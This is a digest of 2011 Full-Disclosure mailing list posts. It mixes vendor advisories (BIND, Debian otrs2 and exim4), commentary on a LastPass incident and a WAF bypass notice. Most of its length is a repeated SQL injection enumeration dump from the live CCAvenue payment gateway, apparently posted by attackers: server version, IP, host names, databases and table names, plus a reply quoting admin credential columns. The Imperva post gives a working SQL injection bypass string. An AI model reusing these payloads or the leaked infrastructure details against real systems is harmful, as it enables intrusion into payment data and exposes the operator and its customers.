Re: [Full-disclosure] Lastpass Security Issue
Ryan, The blog post indicates severe security lapses; for example: Why did the asterisks server have connectivity to the db? If there was some kind of mashup I would expect it to have limited connectivity but I'm not aware of anything like that. If these guys are in the business of security they need to go beyond best practices- take PCI DSS for example; one of the first steps is to limit the Cardholder Data Environment. Different routed and filtered subnets with internal firewalls. I've got a million other suggestions, but w/o further research or information it would be just guessing. Where there is smoke... That being said, lapses happen all the time. I think they are handling it the right way and being over cautious- no one wants to get the notification of a compromise the other way. I sincerely hope they use this an opportunity to review their entire security lifecycle. Policy -- Procedure -- Control -- Audit--Refinement In a different regulatory environment they'd have to follow specific security regimens and audit frequencies with statistically relevant samples. I'm sure the entire team over there is putting in 110%; good luck guys. Liam -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Ryan Sears Sent: Thursday, May 05, 2011 6:39 AM To: full-disclosure Subject: [Full-disclosure] Lastpass Security Issue Hey all, Early this morning the folks over at LastPass decided to issue a warning about a potential security issue based on the fact that they detected some anomalies in their logs. http://blog.lastpass.com/2011/05/lastpass-security-notification.html Basically the post outlines the fact that even though they've investigated everything they can think of, they still noticed data potentially being exfiltrated from one of their DBs, as more information came out then was going in. Because of the fact they can't account for the traffic from any legitimate source, they're being paranoid and assuming the worst (that someone found a SQL injection presumably). Even though their passwords were all salted, they're still forcing everyone to change their master password. Those using 2-factor are relatively un-affected, although they have to change their master passwords as well. This might leave some people who use lastpass in 'Re-enable account hell', where they have their email password stored on lastpass, but can't verify and login to lastpass without clicking an activation link in their email. This can be solved by using one of the plugins in offline mode with your old master password. I'm not sure why they didn't mention it, but this has solved a lot of people's problems. All in all IMHO these guys take security quite seriously. They noticed an anomaly, investigated and hours later posted something about it on their blog. I'm not sure why no emails have been sent out, but there has been speculation that it would have taken too long (http://blog.lastpass.com/2011/05/lastpass-security-notification.html?sh owComment=1304571300013#c1232708813079521918), which I don't really agree with. That should've been their first step IMHO, and that's where they fell on their face a bit with all this. They DO put impressive security measures into place when something does happen though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, CSP, which I've only seen used in super rare cases: http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They're also implementing PBKDF2, so that makes me feel as though with every security issue they're dealing with they don't just identify and re-mediate, but actually restructure their infrastructure in order to hedge against any potential future attack vectors. I personally see this as the best response of any company I've ever seen from a security standpoint. Thoughts? Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DNS BIND Security Advisory: RRSIG Queries Can Trigger Server Crash When Using Response Policy Zones
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: https://www.isc.org/CVE-2011-1907 is the authoritative source for this Security Advisory. Please check the source for any updates. Summary: When a name server is configured with a response policy zone (RPZ), queries for type RRSIG can trigger a server crash. CVE: CVE-2011-1907 Posting date: 05 May 2011 Program Impacted: BIND Versions affected: 9.8.0 Severity: High Exploitable: remotely Description: This advisory only affects BIND users who are using the RPZ feature configured for RRset replacement. BIND 9.8.0 introduced Response Policy Zones (RPZ), a mechanism for modifying DNS responses returned by a recursive server according to a set of rules which are either defined locally or imported from a reputation provider. In typical configurations, RPZ is used to force NXDOMAIN responses for untrusted names. It can also be used for RRset replacement, i.e., returning a positive answer defined by the response policy. When RPZ is being used, a query of type RRSIG for a name configured for RRset replacement will trigger an assertion failure and cause the name server process to exit. Workarounds: Install 9.8.0-P1 or higher. Active exploits: None. However, some DNSSEC validators are known to send type=RRSIG queries, innocently triggering the failure. Solution: Use RPZ only for forcing NXDOMAIN responses and not for RRset replacement. CVSS Score: Base 6.1, adjusted for lack of targets, score is 1.5 (AV:N/AC:L/Au:N/C:N/I:N/A:C/E:P/RL:O/RC:C/TD:L) For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2 Thank you to Mitsuru Shimamura at Internet Initiative Japan for finding this defect. For more information on support and other services for ISC's software products, please visit https://www.isc.org/community/blog/201102/BIND-support For more information about DNS RPZ, please check security advisory @ https://www.isc.org/CVE-2011-1907 Questions about this Security Advisory should be sent to the ISC Security Officer security-offi...@isc.org. - -- Larissa Shapiro Internet Systems Consortium Product Manager Technology Leadership for the Common Good +1 650 423 1335 www.isc.org -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJNwzxdAAoJEBOIp87tasiU8xAIAKavGBzpH994Sh5friyUaZeO jfA+Tusl1wxPxKGy4DSz1Zpkk1DySHPwQ9QShzyK0hR3HTARopEyWjYnWAAIjYsQ EjYZeFuPA3xrG+zCv3nkG4Y49gl+uH60vieMSGKVHYYXcquZ6PTG2Hi5NBNOoxSf 8gqOLl4eWEIDIhHumagYln2usuXw286YbS6aXy4tLOkdah+8ATceGCnJb/EUF4i9 wnbHGoJtCDgCaqOHpKNiPMkEAWmbx3lScA4GlLIEq50lyHpAhTHInLQWLvKa1EbQ NhnSC3RWI5eqI8Terbsp2RLVfe58CDRpOm3p7AUsEYXos1LcB727FQwh0OOl1Yo= =/qmS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0dayz on the 0day
Was anyone able to test and validate this? Infolookup http://infolookup.securegossip.com www.twitter.com/infolookup -Original Message- From: Infant Overflow infant.overf...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Thu, 5 May 2011 10:34:37 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] 0dayz on the 0day ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Silently Pwning Protected-Mode IE9 and Innocent Windows Applications
Our advanced binary planting research goes on... and it's time to reveal some interesting hacks, for instance how to exploit binary planting (or DLL hijacking, if you prefer the less suitable term) to execute remote malicious code through Internet Explorer 9 in protected mode on Windows 7 - without issuing any security warnings. Or how to do the same in Internet Explorer 8 on Windows XP, only even more stealthy. The crux is described in our blog post: http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html or http://bit.ly/im6LcD, while the final missing link to the exploit will be revealed at the Hack in the box conference in Amsterdam on May 19 (http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1399), and shortly thereafter to the rest of the world. Our Guidelines for developers have already been updated for those who hate seeing binary planting, DLL hijacking, DLL preloading or insecure library loading in their software creations: http://www.binaryplanting.com/guidelinesDevelopers.htm Best regards, Mitja Kolsek CEOCTO ACROS, d.o.o. Makedonska ulica 113 SI - 2000 Maribor, Slovenia tel: +386 2 3000 280 fax: +386 2 3000 282 web: http://www.acrossecurity.com ACROS Security: Finding Your Digital Vulnerabilities Before Others Do ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
** (+) Authors : d3hydr8 (+) WebSite : darkode.com (+) Date : 06.05.2011 (+) Hour : 08:21 AM (+) Targets : CCAvenue.com (Payment Gateway) (+) Document: ESA.int Full Disclosure (UPDATED) (+) Method : Hidden SQL Injection ** [ + ] Date: Wed May 3 04:47:33 2011 [ + ] Displaying information about MSSQL host ! [ + ] @@VERSION : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [ + ] USER () : iusr_ccavenueiusr_ccavenue [ + ] S_USER () : iusr_ccavenue [ + ] DB_NAME () : gateway [ + ] HOST_NAME () : AV-2 [ + ] SERVER_NAME () : AVDB-3 [ + ] SERVER_TYPE () : Apache/2.2.14 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 [ + ] X-POWERED-By () : Servlet 2.5; JBoss-5.0/JBossWeb-2.1 [ + ] IP_ADDRESS_INFO : 124.153.83.27 -- [ + ] Displaying list of databases on this MSSQL host ! [ DATABASE: 0 ] : gateway [ DATABASE: 1 ] : master [ DATABASE: 2 ] : tempdb [ DATABASE: 3 ] : model [ DATABASE: 4 ] : msdb [ DATABASE: 5 ] : Reseller - [ DATABASE: 0 ] : gateway [ + ] Displaying Tables inside DB: [ TABLES: 0 ] : addl_merchant_details [ TABLES: 1 ] : admin_details [ TABLES: 2 ] : Admn_dept_roles [ TABLES: 3 ] : Admn_depts [ TABLES: 4 ] : Admn_prvlg_grps [ TABLES: 5 ] : Admn_prvlgs [ TABLES: 6 ] : Admn_role_prvlgs [ TABLES: 7 ] : Admn_roles [ TABLES: 8 ] : Admn_user_prvlgs [ TABLES: 9 ] : Admn_users [ TABLES: 10 ] : amex_cc_details [ TABLES: 11 ] : AMEX_CCDETAILS [ TABLES: 12 ] : amex_mer_details [ TABLES: 13 ] : amtShopperCart [ TABLES: 14 ] : amtShopperCart_MMT [ TABLES: 15 ] : auctionPayment [ TABLES: 16 ] : Auto_cancel [ TABLES: 17 ] : Bop_bank [ TABLES: 18 ] : callcenter_user_login_history [ TABLES: 19 ] : ccav_default_charges [ TABLES: 20 ] : Ccav_genid [ TABLES: 21 ] : Ccav_links [ TABLES: 22 ] : ccav_merchant_options [ TABLES: 23 ] : ccav_payout_allocated_keys [ TABLES: 24 ] : ccav_payout_credit_logs [ TABLES: 25 ] : ccav_payout_credits [ TABLES: 26 ] : ccav_payout_credits_realtime_ [ TABLES: 27 ] : ccav_payout_debits [ TABLES: 28 ] : ccav_payout_debits_realtime_bkp [ TABLES: 29 ] : ccav_payout_details [ TABLES: 30 ] : ccav_payout_details_10MAY2010 [ TABLES: 31 ] : ccav_payout_details_10OCT2010 [ TABLES: 32 ] : ccav_payout_details_12AUG2010 [ TABLES: 33 ] : ccav_payout_details_temp [ TABLES: 34 ] : ccav_payout_summaries_10MAY2010 [ TABLES: 35 ] : ccav_payout_summaries_10OCT2010 [ TABLES: 36 ] : ccav_payout_summaries_12AUG2010 [ TABLES: 37 ] : ccav_payout_summaries_temp [ TABLES: 38 ] : ccav_pending_authorizations [ TABLES: 39 ] : ccav_pending_authorizations_20100918 [ TABLES: 40 ] : ccav_pending_authorizations_20100924 [ TABLES: 41 ] : ccav_recon_sheets [ TABLES: 42 ] : ccav_recon_sheets_20100918 [ TABLES: 43 ] : ccav_recon_sheets_20100924 [ TABLES: 44 ] : Ccav_sms_providers [ TABLES: 45 ] : CCAV_tracking_ids [ TABLES: 46 ] : CCAV_tracking_ids_20100918 [ TABLES: 47 ] : ccav_tracking_ids_20100924 [ TABLES: 48 ] : ccav_trans_status_logs [ TABLES: 49 ] : CCAV_transactions [ TABLES: 50 ] : CCAV_transactions_20100918 [ TABLES: 51 ] : ccav_transactions_20100924 [ TABLES: 52 ] : CCAV_transactions_logs [ TABLES: 53 ] : CCAV_transactions_logs_20100918 [ TABLES: 54 ] : ccav_transactions_logs_20100924 [ TABLES: 55 ] : ccav_transactions_realtime_bkp [ TABLES: 56 ] : ccavenue_scheduler_logs [ TABLES: 57 ] : centurion_debit [ TABLES: 58 ] : Chrc_contact_dets [ TABLES: 59 ] : Chrc_contact_dets_20100918 [ TABLES: 60 ] : Chrc_feedback_dets [ TABLES: 61 ] : Chrc_feedback_dets_20100918 [ TABLES: 62 ] : Chrc_reasons [ TABLES: 63 ] : Chrc_reasons_20100918 [ TABLES: 64 ] : Chrc_srch_dets [ TABLES: 65 ] : Chrc_srch_dets_20100918 [ TABLES: 66 ] : Citi_TxtLog_Child [ TABLES: 67 ] : Citi_TxtLog_Parent [ TABLES: 68 ] : citibank_cc_details [ TABLES: 69 ] : citibank_log [ TABLES: 70 ] : citibank_wkey [ TABLES: 71 ] : COMMISSION [ TABLES: 72 ] : Commission_log [ TABLES: 73 ] : countries [ TABLES: 74 ] : country [ TABLES: 75 ] : country_ip [ TABLES: 76 ] : cpa_20100924 [ TABLES: 77 ] : crs_20100924 [ TABLES: 78 ] : ct_20100918 [ TABLES: 79 ] : ct_20100924 [ TABLES: 80 ] : ct_20101005 [ TABLES: 81 ] : ctl_20100924 [ TABLES: 82 ] : custShopCart [ TABLES: 83 ] : custShopCart_20100918 [ TABLES: 84 ] : custshopcart_20100924 [ TABLES: 85 ] : custShopperCart [ TABLES: 86 ] : DB_SCHEMA [ TABLES: 87 ] : Deprecated_Payment_Invoice [ TABLES: 88 ] : Deprecated_Payment_Invoice_Logs [ TABLES: 89 ] : Dr_Cr_Notes [ TABLES: 90 ] : dtproperties [ TABLES: 91 ] : dummy_shopper_details [ TABLES:
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
But the encrypted everything right? On Fri, May 6, 2011 at 5:33 PM, d3hydr8 D d3hy...@hotmail.com wrote: ** (+) Authors : d3hydr8 (+) WebSite : darkode.com (+) Date : 06.05.2011 (+) Hour : 08:21 AM (+) Targets : CCAvenue.com (Payment Gateway) (+) Document: ESA.int Full Disclosure (UPDATED) (+) Method : Hidden SQL Injection ** [ + ] Date: Wed May 3 04:47:33 2011 [ + ] Displaying information about MSSQL host ! [ + ] @@VERSION : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [ + ] USER () : iusr_ccavenueiusr_ccavenue [ + ] S_USER () : iusr_ccavenue [ + ] DB_NAME () : gateway [ + ] HOST_NAME () : AV-2 [ + ] SERVER_NAME () : AVDB-3 [ + ] SERVER_TYPE () : Apache/2.2.14 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 [ + ] X-POWERED-By () : Servlet 2.5; JBoss-5.0/JBossWeb-2.1 [ + ] IP_ADDRESS_INFO : 124.153.83.27 -- [ + ] Displaying list of databases on this MSSQL host ! [ DATABASE: 0 ] : gateway [ DATABASE: 1 ] : master [ DATABASE: 2 ] : tempdb [ DATABASE: 3 ] : model [ DATABASE: 4 ] : msdb [ DATABASE: 5 ] : Reseller - [ DATABASE: 0 ] : gateway [ + ] Displaying Tables inside DB: [ TABLES: 0 ] : addl_merchant_details [ TABLES: 1 ] : admin_details [ TABLES: 2 ] : Admn_dept_roles [ TABLES: 3 ] : Admn_depts [ TABLES: 4 ] : Admn_prvlg_grps [ TABLES: 5 ] : Admn_prvlgs [ TABLES: 6 ] : Admn_role_prvlgs [ TABLES: 7 ] : Admn_roles [ TABLES: 8 ] : Admn_user_prvlgs [ TABLES: 9 ] : Admn_users [ TABLES: 10 ] : amex_cc_details [ TABLES: 11 ] : AMEX_CCDETAILS [ TABLES: 12 ] : amex_mer_details [ TABLES: 13 ] : amtShopperCart [ TABLES: 14 ] : amtShopperCart_MMT [ TABLES: 15 ] : auctionPayment [ TABLES: 16 ] : Auto_cancel [ TABLES: 17 ] : Bop_bank [ TABLES: 18 ] : callcenter_user_login_history [ TABLES: 19 ] : ccav_default_charges [ TABLES: 20 ] : Ccav_genid [ TABLES: 21 ] : Ccav_links [ TABLES: 22 ] : ccav_merchant_options [ TABLES: 23 ] : ccav_payout_allocated_keys [ TABLES: 24 ] : ccav_payout_credit_logs [ TABLES: 25 ] : ccav_payout_credits [ TABLES: 26 ] : ccav_payout_credits_realtime_ [ TABLES: 27 ] : ccav_payout_debits [ TABLES: 28 ] : ccav_payout_debits_realtime_bkp [ TABLES: 29 ] : ccav_payout_details [ TABLES: 30 ] : ccav_payout_details_10MAY2010 [ TABLES: 31 ] : ccav_payout_details_10OCT2010 [ TABLES: 32 ] : ccav_payout_details_12AUG2010 [ TABLES: 33 ] : ccav_payout_details_temp [ TABLES: 34 ] : ccav_payout_summaries_10MAY2010 [ TABLES: 35 ] : ccav_payout_summaries_10OCT2010 [ TABLES: 36 ] : ccav_payout_summaries_12AUG2010 [ TABLES: 37 ] : ccav_payout_summaries_temp [ TABLES: 38 ] : ccav_pending_authorizations [ TABLES: 39 ] : ccav_pending_authorizations_20100918 [ TABLES: 40 ] : ccav_pending_authorizations_20100924 [ TABLES: 41 ] : ccav_recon_sheets [ TABLES: 42 ] : ccav_recon_sheets_20100918 [ TABLES: 43 ] : ccav_recon_sheets_20100924 [ TABLES: 44 ] : Ccav_sms_providers [ TABLES: 45 ] : CCAV_tracking_ids [ TABLES: 46 ] : CCAV_tracking_ids_20100918 [ TABLES: 47 ] : ccav_tracking_ids_20100924 [ TABLES: 48 ] : ccav_trans_status_logs [ TABLES: 49 ] : CCAV_transactions [ TABLES: 50 ] : CCAV_transactions_20100918 [ TABLES: 51 ] : ccav_transactions_20100924 [ TABLES: 52 ] : CCAV_transactions_logs [ TABLES: 53 ] : CCAV_transactions_logs_20100918 [ TABLES: 54 ] : ccav_transactions_logs_20100924 [ TABLES: 55 ] : ccav_transactions_realtime_bkp [ TABLES: 56 ] : ccavenue_scheduler_logs [ TABLES: 57 ] : centurion_debit [ TABLES: 58 ] : Chrc_contact_dets [ TABLES: 59 ] : Chrc_contact_dets_20100918 [ TABLES: 60 ] : Chrc_feedback_dets [ TABLES: 61 ] : Chrc_feedback_dets_20100918 [ TABLES: 62 ] : Chrc_reasons [ TABLES: 63 ] : Chrc_reasons_20100918 [ TABLES: 64 ] : Chrc_srch_dets [ TABLES: 65 ] : Chrc_srch_dets_20100918 [ TABLES: 66 ] : Citi_TxtLog_Child [ TABLES: 67 ] : Citi_TxtLog_Parent [ TABLES: 68 ] : citibank_cc_details [ TABLES: 69 ] : citibank_log [ TABLES: 70 ] : citibank_wkey [ TABLES: 71 ] : COMMISSION [ TABLES: 72 ] : Commission_log [ TABLES: 73 ] : countries [ TABLES: 74 ] : country [ TABLES: 75 ] : country_ip [ TABLES: 76 ] : cpa_20100924 [ TABLES: 77 ] : crs_20100924 [ TABLES: 78 ] : ct_20100918 [ TABLES: 79 ] : ct_20100924 [ TABLES: 80 ] : ct_20101005 [ TABLES: 81 ] : ctl_20100924 [ TABLES: 82 ] : custShopCart [ TABLES: 83 ] : custShopCart_20100918 [ TABLES: 84 ] : custshopcart_20100924 [ TABLES: 85 ] :
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
adu_id adu_user adu_pwd adu_status dept_id remote_access mobile_number . . . Acc1041 Risk Risk A Acc lol, definitely a risky guy -- Cheers, Kai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2231-1] otrs2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2231-1 secur...@debian.org http://www.debian.org/security/Florian Weimer June 6, 2011 http://www.debian.org/security/faq - - Package: otrs2 Vulnerability : cross-site scripting Problem type : remote Debian-specific: no CVE ID : CVE-2011-1518 Multiple cross-site scripting vulnerabilities were discovered in Open Ticket Request System (OTRS), a trouble-ticket system. (CVE-2011-1518) In addition, this security update a failure when upgrading the package from lenny to squeeze. The oldstable distribution (lenny) is not affected by this problem. For the stable distribution (squeeze), this problem has been fixed in version 2.4.9+dfsg1-3+squeeze1. For the unstable distribution (sid), this problem has been fixed in version 2.4.10+dfsg1-1. We recommend that you upgrade your otrs2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJNxEdsAAoJEL97/wQC1SS+rB0H/jHpQEdgb+w7AXzsEyMUzIKl Jvt9H8Ks6f7Xw17skCW+G7GeiEdBOWRXe2KbWjslMgM5Y9A7nW5Oiltj+ggxYJSp 5W8pYDJQOMnoapY0wpDZRFET+dAM9Iov9fFc2pWhYOfU3WjQOOx2zo3dHSGp3SsO 44r/6iVgoM/pkdMfM9HVs124q27yuwxMkFSiN3SBURbVEh89vu0hSQI4vhmDCjef z6dFGTWEvLSQClromgBdz1zB0VkKZ+CtV7LNSelAB+vvQXCLaTMXKULOdtB889ip zPPaREgNxs4UMZ/69UPGYDilxUwxYUqdr1a1LALfPmzRuvEwyfJJXWhlLQCngCY= =7ZL6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2232-1] exim4 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2232-1 secur...@debian.org http://www.debian.org/security/Florian Weimer May 06, 2011 http://www.debian.org/security/faq - - Package: exim4 Vulnerability : format string vulnerability Problem type : remote Debian-specific: no CVE ID : CVE-2011-1764 Debian Bug : 624670 It was discovered that Exim, the default mail transport agent in Debian, uses DKIM data obtain from DNS directly in a format string, potentially allowing malicious mail senders to execute arbitrary code. (CVE-2011-1764) The oldstable distribution (lenny) is not affected by this problem because it does not contain DKIM support. For the stable distribution (squeeze), this problem has been fixed in version 4.72-6+squeeze1. For the unstable distribution (sid), this problem has been fixed in version 4.75-3. We recommend that you upgrade your exim4 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJNxE8nAAoJEL97/wQC1SS+nZoH/jaNT16XBbfV2ZS6HMiLIKN2 A4rKL50ApLUTyS1ItJmEU5rU+oStNJWdviotI6f5SNB3kumKevC5z/Vt8nv+0luf GSkutY8v8WkjJZb6153nr/QGCjveQpHcayLwBylrVBsr6vhlpe/HpGViU9bpwP+k taU6gS9RlKdAnYPbxQN6VU5OZsNAUvxdYWitnlG0A5uzE0dgMHmb2Blh/l0uvFo9 geBFojcIkg5zXyMQSgXkefwGGaBd2E0MkQRaCkqle4bASRiqB899ltCMCqiFF5j7 zVYZGz0ATEjqN4IWV+wlYh6ifMSSKlnvvOJwzjVjM5sfmV6DC8h5r1saWrnMPNw= =0W3K -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WTF
WTF ? notebook:~$ ping www.compusa.com PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms notebook:~$ ping www.tigerdirect.com PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.022 ms ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Imperva SecureSphere - SQL injection filter bypass
=== Imperva SecureSphere - SQL injection filter bypass === Affected Software : SecureSphere Web Application Firewall (WAF) Severity : High Local/Remote : Remote Author: @drk1wi [Summary] Due to a typo in one of the rules of the sql injection engine the WAF can be bypassed by appending a specially crafted string. [Vulnerability Details] the vector: 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' won't be classified as malicious and will bypass the SQL Injection filter. 'and '0having'='0having' is causing the bypass. [Time-line] 8/07/2010 - Vendor notified 10/07/2010 - Vendor response 12/08/2010 - Vendor patch release 06/05/2011 - Public disclosure (I was cleaning up my comp.) [Fix Information] Apply ADC Content Update from 12 - August - 2010 Cheers, @drk1wi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CCAvenue Payment Gateway SQL Injection Vulnerability
** (+) Authors : i:Spy (+) WebSite : ispyteam.com (+) Date : 06.05.2011 (+) Hour : 08:21 AM (+) Targets : CCAvenue.com (Payment Gateway) (+) Document: ESA.int Full Disclosure (UPDATED) (+) Method : Hidden SQL Injection ** [ + ] Date: Wed May 3 04:47:33 2011 [ + ] Displaying information about MSSQL host ! [ + ] @@VERSION : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [ + ] USER () : iusr_ccavenueiusr_ccavenue [ + ] S_USER () : iusr_ccavenue [ + ] DB_NAME () : gateway [ + ] HOST_NAME () : AV-2 [ + ] SERVER_NAME () : AVDB-3 [ + ] SERVER_TYPE () : Apache/2.2.14 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 [ + ] X-POWERED-By () : Servlet 2.5; JBoss-5.0/JBossWeb-2.1 [ + ] IP_ADDRESS_INFO : 124.153.83.27 -- [ + ] Displaying list of databases on this MSSQL host ! [ DATABASE: 0 ] : gateway [ DATABASE: 1 ] : master [ DATABASE: 2 ] : tempdb [ DATABASE: 3 ] : model [ DATABASE: 4 ] : msdb [ DATABASE: 5 ] : Reseller - [ DATABASE: 0 ] : gateway [ + ] Displaying Tables inside DB: [ TABLES: 0 ] : addl_merchant_details [ TABLES: 1 ] : admin_details [ TABLES: 2 ] : Admn_dept_roles [ TABLES: 3 ] : Admn_depts [ TABLES: 4 ] : Admn_prvlg_grps [ TABLES: 5 ] : Admn_prvlgs [ TABLES: 6 ] : Admn_role_prvlgs [ TABLES: 7 ] : Admn_roles [ TABLES: 8 ] : Admn_user_prvlgs [ TABLES: 9 ] : Admn_users [ TABLES: 10 ] : amex_cc_details [ TABLES: 11 ] : AMEX_CCDETAILS [ TABLES: 12 ] : amex_mer_details [ TABLES: 13 ] : amtShopperCart [ TABLES: 14 ] : amtShopperCart_MMT [ TABLES: 15 ] : auctionPayment [ TABLES: 16 ] : Auto_cancel [ TABLES: 17 ] : Bop_bank [ TABLES: 18 ] : callcenter_user_login_history [ TABLES: 19 ] : ccav_default_charges [ TABLES: 20 ] : Ccav_genid [ TABLES: 21 ] : Ccav_links [ TABLES: 22 ] : ccav_merchant_options [ TABLES: 23 ] : ccav_payout_allocated_keys [ TABLES: 24 ] : ccav_payout_credit_logs [ TABLES: 25 ] : ccav_payout_credits [ TABLES: 26 ] : ccav_payout_credits_realtime_ [ TABLES: 27 ] : ccav_payout_debits [ TABLES: 28 ] : ccav_payout_debits_realtime_bkp [ TABLES: 29 ] : ccav_payout_details [ TABLES: 30 ] : ccav_payout_details_10MAY2010 [ TABLES: 31 ] : ccav_payout_details_10OCT2010 [ TABLES: 32 ] : ccav_payout_details_12AUG2010 [ TABLES: 33 ] : ccav_payout_details_temp [ TABLES: 34 ] : ccav_payout_summaries_10MAY2010 [ TABLES: 35 ] : ccav_payout_summaries_10OCT2010 [ TABLES: 36 ] : ccav_payout_summaries_12AUG2010 [ TABLES: 37 ] : ccav_payout_summaries_temp [ TABLES: 38 ] : ccav_pending_authorizations [ TABLES: 39 ] : ccav_pending_authorizations_20100918 [ TABLES: 40 ] : ccav_pending_authorizations_20100924 [ TABLES: 41 ] : ccav_recon_sheets [ TABLES: 42 ] : ccav_recon_sheets_20100918 [ TABLES: 43 ] : ccav_recon_sheets_20100924 [ TABLES: 44 ] : Ccav_sms_providers [ TABLES: 45 ] : CCAV_tracking_ids [ TABLES: 46 ] : CCAV_tracking_ids_20100918 [ TABLES: 47 ] : ccav_tracking_ids_20100924 [ TABLES: 48 ] : ccav_trans_status_logs [ TABLES: 49 ] : CCAV_transactions [ TABLES: 50 ] : CCAV_transactions_20100918 [ TABLES: 51 ] : ccav_transactions_20100924 [ TABLES: 52 ] : CCAV_transactions_logs [ TABLES: 53 ] : CCAV_transactions_logs_20100918 [ TABLES: 54 ] : ccav_transactions_logs_20100924 [ TABLES: 55 ] : ccav_transactions_realtime_bkp [ TABLES: 56 ] : ccavenue_scheduler_logs [ TABLES: 57 ] : centurion_debit [ TABLES: 58 ] : Chrc_contact_dets [ TABLES: 59 ] : Chrc_contact_dets_20100918 [ TABLES: 60 ] : Chrc_feedback_dets [ TABLES: 61 ] : Chrc_feedback_dets_20100918 [ TABLES: 62 ] : Chrc_reasons [ TABLES: 63 ] : Chrc_reasons_20100918 [ TABLES: 64 ] : Chrc_srch_dets [ TABLES: 65 ] : Chrc_srch_dets_20100918 [ TABLES: 66 ] : Citi_TxtLog_Child [ TABLES: 67 ] : Citi_TxtLog_Parent [ TABLES: 68 ] : citibank_cc_details [ TABLES: 69 ] : citibank_log [ TABLES: 70 ] : citibank_wkey [ TABLES: 71 ] : COMMISSION [ TABLES: 72 ] : Commission_log [ TABLES: 73 ] : countries [ TABLES: 74 ] : country [ TABLES: 75 ] : country_ip [ TABLES: 76 ] : cpa_20100924 [ TABLES: 77 ] : crs_20100924 [ TABLES: 78 ] : ct_20100918 [ TABLES: 79 ] : ct_20100924 [ TABLES: 80 ] : ct_20101005 [ TABLES: 81 ] : ctl_20100924 [ TABLES: 82 ] : custShopCart [ TABLES: 83 ] : custShopCart_20100918 [ TABLES: 84 ] : custshopcart_20100924 [ TABLES: 85 ] : custShopperCart [ TABLES: 86 ] : 